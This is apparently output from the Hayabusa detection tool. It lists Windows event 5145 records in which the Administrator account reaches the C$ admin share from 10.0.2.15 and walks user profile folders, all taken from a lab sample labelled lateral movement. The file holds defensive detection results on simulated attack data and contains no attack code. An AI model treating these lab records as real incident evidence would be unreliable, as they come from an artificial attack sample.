2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
